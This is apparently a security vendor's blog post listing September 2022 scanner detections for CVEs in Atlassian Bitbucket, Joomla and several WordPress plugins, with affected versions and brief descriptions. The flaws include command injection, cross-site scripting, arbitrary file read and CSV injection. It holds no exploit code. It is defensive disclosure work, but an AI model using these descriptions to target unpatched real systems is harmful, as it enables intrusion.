September 2022 Web Application Vulnerabilities Released

Ed Arnold

The Qualys WAS team has released a new series of signatures (detections) to report the vulnerabilities in the following 3 frameworks:  Atlassian, Joomla, and WordPress. Organizations can immediately audit their networks for the following vulnerabilities.

Atlassian

QID 150574: Atlassian Bitbucket Server and Data Center – Command Injection Vulnerability (CVE-2022-36804)

Bitbucket is a Git-based source code repository hosting service owned by Atlassian.

In affected versions of Atlassian Bitbucket Server and Data Center a Command Injection Vulnerability exists in multiple API endpoints where an attacker with access to a public repository or with read permissions to a private Bitbucket repository can execute arbitrary code by sending a malicious HTTP request.

Affected versions :
Atlassian Bitbucket Server and Data Center version from 7.0.0 before version 7.6.17
Atlassian Bitbucket Server and Data Center version from 7.7.0 before version 7.17.10
Atlassian Bitbucket Server and Data Center version from 7.18.0 before version 7.21.4
Atlassian Bitbucket Server and Data Center version from 8.0.0 before version 8.0.3
Atlassian Bitbucket Server and Data Center version from 8.1.0 before version 8.1.3
Atlassian Bitbucket Server and Data Center version from 8.2.0 before version 8.2.2
Atlassian Bitbucket Server and Data Center version from 8.3.0 before version 8.3.1

Joomla

QID 154122: Joomla! Core Full Path Disclosures Vulnerability (CVE-2022-27911)

Joomla! is a free and open-source content management system for publishing web content on websites.

The vulnerability exists due to excessive data output by the application while handling error conditions. A remote attacker can obtain sensitive information on the system, such as full installation path of the web application.

Affected Versions:
Joomla 4.2.0

WordPress

WordPress is an open-source content management system (CMS) written in PHP

QID 150566: WordPress WooCommerce PDF Invoices and Packing Slips Plugin: Reflected Cross-Site Scripting Vulnerability (CVE-2022-2537)

WooCommerce PDF Invoice and Packing Slips is a WooCommerce extension plugin that automatically adds a PDF invoice to the order confirmation emails sent out to your customers.

The plugin does not escape the tab and section parameters before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting in the admin dashboard.

Affected versions:
WooCommerce PDF Invoice and Packing Slips from 2.14.0 to 3.0.1


QID 150567: WordPress Shareaholic Plugin : Information Disclosure Vulnerability (CVE-2022-0594)

Shareaholic is a WordPress plugin which allows users to add Social share buttons, related posts, content analytics, Ad monetization to your website.

Affected versions of Shareaholic plugin does not have proper authorization check in “shareaholic_debug_info” AJAX action, available to unauthenticated users in version prior to 9.7.5 and author and high privilege users in version 9.7.5, allowing them to call it and retrieve sensitive information such as the list of active plugins, various version like PHP, cURL, WordPress etc.

Affected versions:
Shareaholic prior to version 9.7.6


QID 150569: WordPress Database Backup Plugin: Stored Cross-Site Scripting Vulnerability (CVE-2022-2271)

WP Database Backup plugin helps you to create Database Backup and Restore Database Backup easily on single click. manual or automated backups.

The plugin does not escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks when the unfiltered_html capability is disallowed.

Affected versions:
WP Database Backup WordPress plugin before 5.9


QID 150570: WordPress BackupBuddy Plugin: Arbitrary File Read Vulnerability (CVE-2022-31474)

The BackupBuddy plugin for WordPress is designed to make back-up management easy for WordPress site owners.

Affected versions of BackupBuddy plugin do not validate the URL parameter in “local-download” and/or “local-destination-id” AJAX action before using it and returning its content in HTTP response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc).

Affected versions:
BackupBuddy versions 8.5.8.0 through 8.7.4.1


QID 150573: WordPress Affiliates Manager Plugin: Multiple Vulnerabilities (CVE-2022-2798,CVE-2022-2799)

The WP Affiliate Manager plugin is a WordPress plugin. It facilitates the affiliates recruitment, registration, login, management process.

Affiliate Manager plugin contains multiple vulnerabilities:
CVE-2022-2799 : The plugin does not sanitize and escape some of its settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

CVE-2022-2798: The plugin does not validate and sanitize the affiliate data, which could allow users registering as affiliate to perform CSV injection attacks against an admin exporting the data.

Affected Versions:
The WP Affiliate Manager WordPress plugin before 2.9.14

Share your Comments

Comments

Your email address will not be published.